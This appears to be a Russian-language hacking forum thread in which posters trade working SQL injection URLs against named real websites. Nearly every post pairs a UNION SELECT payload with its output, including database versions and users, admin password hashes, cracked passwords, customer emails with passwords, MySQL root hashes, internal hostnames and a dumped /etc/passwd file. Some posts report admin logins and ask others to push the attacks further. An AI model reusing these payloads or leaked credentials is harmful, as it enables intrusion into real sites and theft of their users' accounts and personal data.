Code: http://www.inforealt.ru/content/?id=-1+union+select+1,concat(login,0x3a,passwd),3,4,5,6,7,8,9,10+from+sitexpert_users--
Code: http://www.exclusivewebsolutions.co.uk/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())-- user(): web225-a-joo-133@localhost version(): 5.0.67-community database(): web225-a-joo-133 admin:5146ece4d7ee8bea2996a94aa5b4d72f:ltQAvqnDA0XCLWk0N2kI0Ns2qW9SWEry PR = 2 Code: http://www.seeleman.nl/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())-- user(): [email protected] version(): 5.0.32-Debian_7etch6 database(): md106698db52069 admin:c30cc14f6a417d111ebac62c3fb38d66:M1Cw74qU76QWf9nem8O85DTQcFLU2kTz
Магазиинчик Code: http://www.colortek-shop.ru/instr_full.php?pub_id=-3%20UNION%20SELECT%201,concat_ws(0x3a,user(),version(),database()),3 version:: 5.0.32-Debian_7etch1-log user::[email protected] database:: z40650_1 Code: http://www.newslook.ru/index.php?id=999999%20UNION%20SELECT%201,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10 version::5.0.67 user::newslook@localhost database::newslook
Ultimate Collection of quality software!!! http://www.sharewareriver.com/product.php?id=3318908098+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- Database Version: 5.0.45-log Database name: a0020843 User name: [email protected] Database [a0020843] Table [advertise (3 Rows)] id prod_id cat_id start_date end_date order_id comments Table [authors (25584 Rows)] id title homepage e_mail regnow_id PASSWORD linked shareit_id subscribed Table [categories (111 Rows)] id title LEVEL parent_id display_order Table [keywords (1 Rows)] id keywords author_id prod_id show_price shows rnd devisor counter start_date payment ballance order_id screenshot comments Table [kwd_reserve (3 Rows)] id keywords price deposit date_added e_mail Table [order_urls (5123 Rows)] id prod_id date_added new_url Table [products (71626 Rows)] id author_id cat_id title version platform short_desc long_desc price size download_url order_url hits hits0 rating screenshot_url date_added featured keywords status order_url0 Достаём юзеров лимитом их там за 25 косарей http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(0x7873716C696E6A626567696E,(SELECT+CONCAT(id,0x7873716C696E6A64656C,title,0x7873716C696E6A64656C,e_mail,0x7873716C696E6A64656C,PASSWORD)+FROM+a0020843.authors+LIMIT+1,1),0x7873716C696E6A656E64),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- [1]:4:#1 ACE:[email protected]:X2nJ9tBh [2]:5:MeanFox:[email protected]:fwpfwpfw [3]:6:10-Strike Software:[email protected]:nRHP8Psg Далее скучно.... http://www.sharewareriver.com/product.php?id=3318908098+UNION+SELECT+1,2,3,4,5,6,7,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- Читаем /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13roxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin statd:x:101:65534::/var/lib/nfs:/bin/false snmp:x:102:65534::/var/lib/snmp:/bin/false ntp:x:103:103::/home/ntp:/bin/false mysql:x:1000:104::/home/mysql:/bin/sh exim:x:104:105::/var/spool/exim4:/bin/false bacula:x:105:106:Bacula:/var/lib/bacula:/bin/false
gooody.at Code: http://www.gooody.at/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(version(),0x3a,database(),0x3a,user()) user(): db1070925-gooody version(): 5.0.32-Debian_7etch8-log database(): dbu1070925@localhost PR=3 admin:4a03c8d6910be8db872e6dc4f70ee4ed:kouCfOZj8PYKj690MgWP7BY7ljmthHtr "Гостиный дом" Code: http://gostidom.com/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()) user(): _bdgosti version(): 5.0.45 database(): myroot@localhost admin:7c2adff331c4807dd7d2d9dc0cd8bc10:08ayLZq2giqNZsBQDTf9xS2BXTGDmxqC
http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8-- User:web_user@localhost Version:5.0.45-Debian_1ubuntu3.4-log Databasere_trib_new /home/pre_trib/releases/20090114_220536/article-view.php Достаём Рута http://www.pre-trib.org/article-view.php?id=3809809832+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8+from+mysql.user-- root:*85BCC49962DFC4BE4580D8D14155504478DC9461
http://www.ndsu.edu/wwwdev/ndsu_webcal/index.php?cid=-187%20union%20select%201,concat_ws(0x3a,lname,fname,email),3+from+administrators/* https://www.lebow.drexel.edu/Newsroom/Newsletters/index.php?cid=-5+union+select+1,2,3,version(),5,6,7,8,9,10,11-- http://www.pemaquid.com/content-manager/story.php?cID=-86+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- http://www.latinoboxing.com/story.php?cid=-10382+union+select+1,2,3,4,version(),6--
http://www.ex-elec.com/files/firm.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+limit+0,1-- хеш расшифровывается так: bigbear войти под логином admin и пассом bigbear не удается =( Кто сможет - черкните =)
https://www.bioinquire.com/product-profile.php?ID=-1+union+select+1,2,concat_ws(0x3a,email,userpass),4,5,6,7,8,9,10,11,12+FROM+Tigeradmin_Users+limit+0,1+-- [email protected]:ta21XwWv/Yggk чем пароль зашифрован - не могу понять?
Кто хоть что-нибудь дальше раскрутит киньте в ПМ хотя бы название таблы...на парочке есть phpbb, но то ли префиксов незнаем, то ли БД другая..
http://www.overclockers.co.uk/showproduct.php?prodid=CD-092-LO&groupid=701&catid=10&subcat=-314+union+select+user(),version(),database()/* http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,8,9,10,11,12/* sitcom_work@localhost 4.1.22-standard-log sitcom_BSG http://www.sitcom.co.uk/news/news.php?story=-000456+union+select+1,concat_ws(char(58),email,password),3,4,5,6,7,8,9,10,11,12+from+users/* [email protected]:5ddadf914707c31330fa85b78ac3e9e4:testing8 http://www.sitcom.co.uk/login/login.php http://www.sff.co.uk/display_article.php?articleid=-160+union+select+1,binary(user()),3,4,binary(version()),6/* [email protected] 4.1.15-standard SFF_prod
Version:4.1.22-standard User:tw711co_man@localhost Database:tw711co_movies Database Version: 5.0.67-log Database name: walkerco_booksDB User name: [email protected] Вывод на картиночке -) Database Version: 5.0.67-community Database name: coolwall_fondos User name: coolwall_coolwal@localhost Нужное нам в количестве 1100 [1]:Ricardo Hempel:rickhs:cosmic7:44:[email protected]:0iqzljc1719eC6FKIkpX2 [2]:artek:masterartek:donkeykong:228:[email protected]:0wJAb4z1rZ3745pB1wMkF [3]:Juan Carlos:Juank:kipipa:44:[email protected]:0323DsZ4NmPRK8122PUdr итд.... МАГАЗИН КНИГ Database Version: 5.0.27-standard Database name: Clients_Bookpassage User name: Bookpassage@localhost Это сами -) Vineyard Gazette Online User:gazette_write@localhost Version:5.0.51a-3ubuntu5.1 Database:gazette_online
Code: http://ua.salvationchurch.com.ua/news?id=-243+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5 salvchurch_ua@beta 4.1.22-log salvchurch_ua Code: http://sdl.com.ua/index.php?page=news_item&id=-78+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5 sdl@beta 4.1.22-log sdl Code: http://www.selteq.com/tablename/sq_news_items/id/-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 rssi_selteq@beta 4.1.22-log rssi_selteq Code: http://razno.ru/out/?id=1796+union+select+concat_ws(0x3a,version(),database(),user()) 5.0.67-log u10534 [email protected] Code: http://safarov.ru/06.php?act=news_by_id&news_id=-15208+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8-- iran@localhost 4.1.22-log site_safarov Code: http://hcdynamo.com/?player&id=-1051+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),10,11,12 hcdynamo@localhost 4.1.22-log hcdynamodb
Database Version: 4.0.24_Debian-10sarge1-log Database name: fractal User name: fractal@localhost Database Version: 5.0.67-log Database name: mailarchive User name: [email protected] User:tv3ouser@localhost Version:4.1.20 Database:tv3o
www.boosthead.com [email protected]:4.1.16-standard-log доступа к mysql.user,таблы не подбирал,но сомневаюсь что там есть что-нить интересное. www.pitatel.ru root@localhost:4.0.22-standard:mysql root::localhost:N ::localhost:N ::main.hs.orc.ru:N root::main.hs.orc.ru:Y http://www.twn.tuv.com administrator@localhost:tuv:4.0.15-nt-log хмм...идём дальше... root без пароля,жаль что localhost,смотри дальше... root::% а это уже оч. интересно),смотрим дальше через лимит ::localhost ::% administrator:6f413e564c08bbe7:localhost administrator:6f413e564c08bbe7:% webuser:7bd4ed7716dedbad:127.0.0.1 administrator:40d09e975f996754:10.160.15.84 administrator:40d09e975f996754:10.160.15.72 hct:40d09e975f996754:asktuv.twn.tuv.com hct:40d09e975f996754:172.16.48.7 hct:40d09e975f996754:taipei-databases.twn.tuv.com бывает....
http://www.sex-shop-online.net/ndex.php?blockyid=catalog&cat=-1+union+select+concat_ws(0x3a3a,username,password)+from+pref_users-- http://www.sex-shop-online.net/admin/ login:admin pass:tyeugdc Админим магазин самотыков...
http://www.usadba.ru/city/flat/213123/? or 1=1-- - выполняется на ура http://www.usadba.ru/city/flat/213123/? union select 1-- пишет Количество полей так подобрать и не удалось. Версия, выше 5й, т.к., information_schema присутствует Вообщем, если кто сможет подобрать количество полей - отпишитесь пожалуйста.
CDKWeb Code: https://www.cdkweb.com/inthenewsdetails.php?id=-19+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7-- user(): cdkuser@localhost version(): 4.1.22 database(): cdk PR: 6 таблицы не подобрал(( Fortune Software Code: http://cfortune.kics.bc.ca/templates/chili.pepper/index.php?id=-19+union+select+1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6-- user(): cfortune@localhost version(): 5.0.51a-3ubuntu5.4 database(): cfortune тИЦ: 10 PR: 4 таблиц куча: c_reg_users user dating_users из c_reg_users: admin:bed128365216c019988915ed3add75fb auctiontal:ba69897483886f0d2b0afb6345b76c0c из user: cfortune:jamocha gina:gina evemiranda:eve1
http://forge.mysql.com Code: [color=white]http://forge.mysql.com/tools/search.php?sortby=(added_on*if(ascii(substring((select+version()+from+information_schema.tables+limit+1,1),1,1))=53,1,-1))&sortorder=desc&page=9[/color] Инъекция после ордер бай, крутить очень долго, даже со скриптами p.s. история повторяется =) http://forum.antichat.ru/showpost.php?p=520975&postcount=1
